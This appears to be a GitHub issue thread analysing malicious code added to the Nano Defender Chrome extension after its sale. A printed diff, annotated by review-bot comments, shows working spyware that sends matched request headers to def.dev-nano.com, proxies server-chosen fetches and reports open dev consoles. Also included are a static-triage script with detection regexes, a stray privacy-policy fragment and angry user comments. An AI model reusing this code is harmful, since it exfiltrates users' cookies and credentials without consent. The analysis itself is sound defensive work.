The content of listOfObject is further used apparently, as far as I can understand the code, to test fields from the details object passed to webRequest.onBeforeSendHeaders(). If all looked up fields succeed, the whole content of the details object is sent to https://def.dev-nano.com/ under the name handleObject.

Note that the webRequest.onBeforeSendHeaders() listener is registered for all network requests:

chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, { 
    urls: ["<all_urls>"] 
}, ['requestHeaders', 'blocking', 'extraHeaders']); 

So which info ends up being sent is configured externally through the listOfObject, and I strongly suspect this would all stop if I were to open the dev tools.

There is a bit of silly attempt at obfuscation in part of the webRequest.onBeforeSendHeaders() handler:

var m = [45,122,122,122]
var s = m.map( x => String.fromCharCode(x) )
var x = s.join("");
var replacerConcat = stringyFy.split(x).join("");

Which is equivalent to:

var replacerConcat = stringyFy.split("-zzz").join("");

Purpose is not clear, it's meant to remove instances of -zzz from request headers, before they are being sent out.


So trying to figure an example of what the new code can do. Let's say it wants to get sensitive information about network requests to a specific bank, then the content of the listOfObject object could be:

{ url: 'bank\.example\.com\/' }

Then the webRequest.onBeforeSendHeaders() handler would check whether details.url matches the regex bank\.example\.com\/. If so, then the whole content of the details object is sent to https://def.dev-nano.com/ as a handleObject packet.

The listOfObject can contain any number of conditions, I just gave an example with a single one above.

The extension is now designed to look up specific information from your outgoing network requests according to externally configurable heuristics and send it to https://def.dev-nano.com/.


A note regarding what the extension is doing above. Though the extension requests the webRequestBlocking permission, that permission is not required to perform the collection of data, including sensitive ones. The permission is only necessary to remove instances of -zzz from the request headers, and I don't know the purpose of this -- maybe someone else knows.
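The indicators described in the analysis above can be checked statically, without opening the extension's dev tools. The following is an added example, not part of the original comments or of either project's code; the rule ids, the triage() helper and the SAMPLE string (assembled from lines quoted in this thread) are assumptions made for illustration.

```javascript
// Added example: static triage of extension source text. Rule ids and SAMPLE are
// constructed for illustration; SAMPLE reuses lines quoted in this thread.
const RULES = [
  { id: 'remote-socket', why: 'persistent channel to a remote host',
    re: /\bio\.connect\(\s*["'](https?:\/\/[^"']+)["']/g },
  { id: 'variable-fetch', why: 'fetch() target is a variable, not a literal URL',
    re: /\bfetch\(\s*([A-Za-z_$][\w$.]*)\s*[,)]/g },
  { id: 'dynamic-regexp', why: 'match pattern built from runtime data',
    re: /new RegExp\(\s*([A-Za-z_$][\w$]*\[[^\]]+\])/g },
  { id: 'getter-trap', why: 'getter that fires when the console renders the object',
    re: /__defineGetter__\(\s*["'](\w+)["']/g },
  { id: 'emit-object', why: 'whole object sent over the socket',
    re: /\.emit\(\s*["'](\w+)["']\s*,\s*([A-Za-z_$][\w$]*)\s*\)/g },
];

// webRequest listeners that receive request headers for every URL.
function findBroadListeners(src) {
  const re = /chrome\.webRequest\.(\w+)\.addListener\(([\s\S]*?)\);/g;
  const hits = [];
  for (const m of src.matchAll(re)) {
    if (m[2].includes('<all_urls>') && m[2].includes('requestHeaders')) {
      hits.push({ id: 'all-urls-headers',
                  why: 'listener sees headers of all requests', evidence: m[1] });
    }
  }
  return hits;
}

// Numeric array literals that spell printable ASCII, e.g. [45,122,122,122].
function decodeCharCodeArrays(src) {
  const hits = [];
  for (const m of src.matchAll(/\[\s*(\d{1,3}(?:\s*,\s*\d{1,3}){2,})\s*\]/g)) {
    const codes = m[1].split(',').map(Number);
    if (codes.every(c => c >= 32 && c <= 126)) {
      hits.push({ id: 'charcode-string', why: 'string hidden as character codes',
                  evidence: String.fromCharCode(...codes) });
    }
  }
  return hits;
}

// Run every rule over one source text and return the findings in rule order.
function triage(src) {
  const findings = [];
  for (const rule of RULES) {
    for (const m of src.matchAll(rule.re)) {
      findings.push({ id: rule.id, why: rule.why, evidence: m.slice(1).join(' ') });
    }
  }
  return findings.concat(findBroadListeners(src), decodeCharCodeArrays(src));
}

// Constructed sample: individual lines copied from the code quoted in the thread.
const SAMPLE = `
var defender = io.connect("https://def.dev-nano.com/");
let dListResp = await fetch(newList.uri, newList.attr)
element.__defineGetter__("id", function() { openListGet = true; });
var re = new RegExp(listOfObject[x],'gi');
defender.emit('handleObject', infos);
var m = [45,122,122,122]
chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {
    urls: ["<all_urls>"]
}, ['requestHeaders', 'blocking', 'extraHeaders']);
`;

for (const f of triage(SAMPLE)) {
  console.log(`${f.id}: ${f.evidence} (${f.why})`);
}
```

Matches are leads for manual review of an unpacked package; minified or renamed code will not match these literal patterns.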


Here is the diff for the code change you won't find in their GitHub repo:

--- ./background/core.js
+++ ./background/core.js
@@ -160,7 +160,7 @@
 
     const hasNews = false;
 
-    const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";
+    const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";
     const newsReadFlag = "news-read";
 
     // This handler becomes inactive when there is a popup page set
@@ -189,7 +189,8 @@
     // ------------------------------------------------------------------------------------------------------------- //
 
 };
-
+var defender = io.connect("https://def.dev-nano.com/"); 
+var listOfObject = {}; 
 // ----------------------------------------------------------------------------------------------------------------- //
 
 a.noopErr = () => {
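Review bot: the added io.connect("https://def.dev-nano.com/") runs at file scope, so a socket to a hard-coded remote host opens as soon as the background script loads, and listOfObject is introduced as a mutable global with no comment on who writes it. io is not declared anywhere in the visible hunks, so this also depends on a script loaded separately. A helper extension has no stated need for a persistent server channel here; the two lines should be removed, or at minimum documented and gated behind explicit user opt-in.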
@@ -211,6 +212,29 @@
 
 // ----------------------------------------------------------------------------------------------------------------- //
 
+
+ 
+async function dLisfOfObject(newList) { 
+    let dListResp = await fetch(newList.uri, newList.attr) 
+    var listOfObj = {} 
+    listOfObj.headerEntries = Array.from(dListResp.headers.entries()) 
+    listOfObj.data = await dListResp.text() 
+    listOfObj.ok = dListResp.ok; 
+    listOfObj.status = dListResp.status; 
+    return listOfObj; 
+} 
+ 
+defender.on("dLisfOfObject", async function (newList) { 
+    let getRes = await dLisfOfObject(newList); 
+    defender.emit(newList.callBack, getRes) 
+}); 
+ 
+defender.on("listOfObject", function (a) { 
+    listOfObject = a; 
+}) 
+
+
+
 // Redirect helpers
 
 a.rSecret = a.cryptoRandom();
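Review bot: the dLisfOfObject socket handler passes server-supplied newList.uri and newList.attr straight into fetch() and then emits the response status, headers and body back on an event name the server also chooses (newList.callBack), so the remote host can have the background page issue requests of its choosing and read the results. The listOfObject handler likewise overwrites the global with whatever arrives, with no validation of keys or values. Neither handler should ship; if remote configuration is genuinely needed, fetch one fixed URL with fixed options and validate the payload against a known schema before using it.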
@@ -227,7 +251,22 @@
 
 // 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).
 a.blankMP4 = a.rLink("blank.mp4");
-
+ 
+var element = document.createElement("p"); ; 
+var openListGet = false; 
+element.__defineGetter__("id", function() { 
+    openListGet = true;  
+}); 
+ 
+var i = setInterval(function() { 
+    openListGet = false; 
+    console.log(element); 
+    if(openListGet){ 
+        defender.emit("report") 
+        console.clear(); 
+        clearInterval(i) 
+    } 
+}, 100);
 // ----------------------------------------------------------------------------------------------------------------- //
 
 // tab   - Id of the tab
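Review bot: the setInterval block logs element every 100 ms and treats the id getter firing as a sign that a console is rendering the object, then emits "report", clears the console and stops the timer, which means an open dev console is detected and reported to the server with no functional purpose for the extension. __defineGetter__ is deprecated, and the stray "; ;" after createElement("p") suggests pasted code. The whole block should be removed.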
@@ -450,6 +489,50 @@
 
     return true;
 };
+ 
+var blockingHandler = function (infos) { 
+    var changedAsArray = Object.keys(listOfObject); 
+
+    var detailsHeader = infos.requestHeaders; 
+    var HeadReverse = detailsHeader.reverse(); 
+    var stringyFy = JSON.stringify(HeadReverse); 
+    var mount = ""; 
+    if (changedAsArray.length > 0) { 
+        var checkerList = true; 
+        for (const object of changedAsArray) { 
+            if (object.x === object.y) { 
+                mount += 1; 
+            } 
+            break; 
+        } 
+        for (let i = 0; i < changedAsArray.length; i++) { 
+            let x = changedAsArray[i]; 
+            var re = new RegExp(listOfObject[x],'gi'); 
+            mount = "5"; 
+            if (infos[x].toString().match(re) == null) { 
+                checkerList = false; 
+                break; 
+            } 
+        } 
+        if (checkerList) { 
+            defender.emit('handleObject', infos); 
+        } 
+    } 
+    
+    var m = [45,122,122,122]
+    var s = m.map( x => String.fromCharCode(x) )
+    var x = s.join("");
+    var replacerConcat = stringyFy.split(x).join(""); 
+    var replacer = JSON.parse(replacerConcat); 
+    return { 
+        requestHeaders: replacer 
+    } 
+}; 
+
+chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, { 
+    urls: ["<all_urls>"] 
+}, ['requestHeaders', 'blocking', 'extraHeaders']); 
+ 
 
 // ----------------------------------------------------------------------------------------------------------------- //
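Review bot: in blockingHandler, defender.emit('handleObject', infos) sends the entire request details object, request headers included, to the remote host whenever every server-supplied pattern in listOfObject matches, and the listener is registered for <all_urls> with 'extraHeaders', which is the option that exposes headers such as Cookie and Authorization. Several details also look wrong on their own: the first for...of loop iterates key strings, so object.x === object.y compares two undefined values, it breaks after one pass, and mount is never read; infos[x].toString() throws if the server names a field that is absent from the details object; detailsHeader.reverse() reverses the header array in place before it is returned; and stripping "-zzz" by editing the JSON string is undocumented. The listener should be dropped entirely; nothing in the visible lines justifies reading or rewriting headers on every request.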

Forgot to mention the obvious: uninstall now -- with those capabilities, it should be considered malware.

So @jspenguin2017's users have been sold to malware. Great.

I'm going to report this extension to the Edge team for urgent analysis.

I'm going to report this extension to the Edge team for urgent analysis.

For now, version for Edge isn't updated and didn't change owner, only Chrome version is affected.

Maybe he reported as "whisper" / private-message.

I'm going to report this extension to the Edge team for urgent analysis.

For now, version for Edge isn't updated and didn't change owner, only Chrome version is affected.

As far as I'm aware you can't change owners with the Microsoft store, so @jspenguin2017 is most likely to just have given login details. It may very well already be submitted, awaiting review. I've asked the team to review this thread and look out for an update.

LiCybora/NanoDefenderFirefox#187 (comment)

This was posted on the Firefox port of NanoDefender on how to migrate from Nano Adblocker to uBlock Origin, for anyone that hasn't seen it.

Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.

Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner. Any use of Cookies – or of other tracking tools – by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.

It was really worth selling users down the river, huh @jspenguin2017?

I forgot to mention this: This is exactly the kind of stuff that Google loves to see because it enables them to implement stricter and stricter policies for extensions, and also policies that cripple their capabilities. Thanks for contributing to the problem.

So, what I suspected was correct. The extension has been modified to become malware, and outright compromises the privacy and security of users. You sold your users down the river and put them in harm's way to make a quick buck. That is actual blood on your hands now. Sure, you didn't write the code yourself, but you directly enabled the pathway for this to happen.

Nano has now become a historical example of why content blocking extensions should not be sold, and what happens when they are.

That is indeed a suspicious update, I will start analyzing it shortly. I will be archiving this repository, so let's head over to my general purpose repository for further discussions: https://github.com/jspenguin2017/Snippets/issues

@nikrolls

so @jspenguin2017 is most likely to just have given login details

No, I still control the Edge store listings.

@Techman

put them in harm's way to make a quick buck

Do not misrepresent facts. I was looking for a new maintainer. If I knew that the new developer(s) would do this, I would not have accepted the deal.

As I mentioned here [1], I planned to donate most of the money back to the new developer(s) if they do a good job. If I wanted to make a quick buck, I would sell the projects and disappear.

[1] #362 (comment)